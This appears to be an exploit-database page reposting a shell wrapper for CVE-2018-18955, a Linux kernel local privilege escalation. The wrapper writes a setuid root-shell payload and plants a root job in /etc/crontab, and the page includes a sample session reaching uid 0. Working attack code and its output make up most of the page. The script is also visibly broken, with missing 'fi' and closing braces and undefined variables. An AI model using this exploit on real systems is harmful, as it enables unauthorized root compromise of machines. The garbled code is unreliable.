Linux kernel 4.15.x < 4.19.2 map_write() cap_sys_admin local privilege escalation (cron method) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-11-21 | Type : local | Platform : linux
This exploit / vulnerability Linux kernel 4.15.x < 4.19.2 map_write() cap_sys_admin local privilege escalation (cron method) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# EDB Note: Download ~
# wrapper for Jann Horn's exploit for CVE-2018-18955
# uses crontab technique
# ---
# test@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955$ ./
# [*] Compiling...
# [*] Writing payload to /tmp/payload...
# [*] Adding cron job... (wait a minute)
# [.] starting
# [.] setting up namespace
# [~] done, namespace sandbox set up
# [.] mapping subordinate ids
# [.] subuid: 165536
# [.] subgid: 165536
# [~] done, mapped subordinate ids
# [.] executing subshell
# [+] Success:
# -rwsrwxr-x 1 root root 8384 Nov 21 19:47 /tmp/sh
# [*] Cleaning up...
# [!] Remember to clean up /etc/crontab
# [*] Launching root shell: /tmp/sh
# root@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955# id
# uid=0(root) gid=0(root) groups=0(root),1001(test)


command_exists() {
command -v "${1}" >/dev/null 2>/dev/null

if ! command_exists gcc; then
echo '[-] gcc is not installed'
exit 1

if ! command_exists /usr/bin/newuidmap; then
echo '[-] newuidmap is not installed'
exit 1

if ! command_exists /usr/bin/newgidmap; then
echo '[-] newgidmap is not installed'
exit 1

if ! test -w .; then
echo '[-] working directory is not writable'
exit 1

echo "[*] Compiling..."

if ! gcc subuid_shell.c -o subuid_shell; then
echo 'Compiling subuid_shell.c failed'
exit 1

if ! gcc subshell.c -o subshell; then
echo 'Compiling gcc_subshell.c failed'
exit 1

if ! gcc rootshell.c -o "${rootshell}"; then
echo 'Compiling rootshell.c failed'
exit 1

echo "[*] Writing payload to ${bootstrap}..."

echo "#!/bin/sh\n/bin/chown root:root ${rootshell};/bin/chmod u+s ${rootshell}" > $bootstrap
/bin/chmod +x "${bootstrap}"

echo "[*] Adding cron job... (wait a minute)"

echo "echo '* * * * * root ${bootstrap}' >> /etc/crontab" | ./subuid_shell ./subshell
sleep 60

if ! test -u "${rootshell}"; then
echo '[-] Failed'
/bin/rm "${rootshell}"
/bin/rm "${bootstrap}"
exit 1

echo '[+] Success:'
ls -la "${rootshell}"

echo '[*] Cleaning up...'
/bin/rm "${bootstrap}"
/bin/rm subuid_shell
/bin/rm subshell
if command_exists /bin/sed; then
echo "/bin/sed -i '\$ d' /etc/crontab" | $rootshell
echo "[!] Manual clean up of /etc/crontab required"

echo "[*] Launching root shell: ${rootshell}"

Linux kernel 4.15.x < 4.19.2 map_write() cap_sys_admin local privilege escalation (cron method)

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Linux kernel 4.15.x < 4.19.2 map_write() cap_sys_admin local privilege escalation (cron method) Vulnerability / Exploit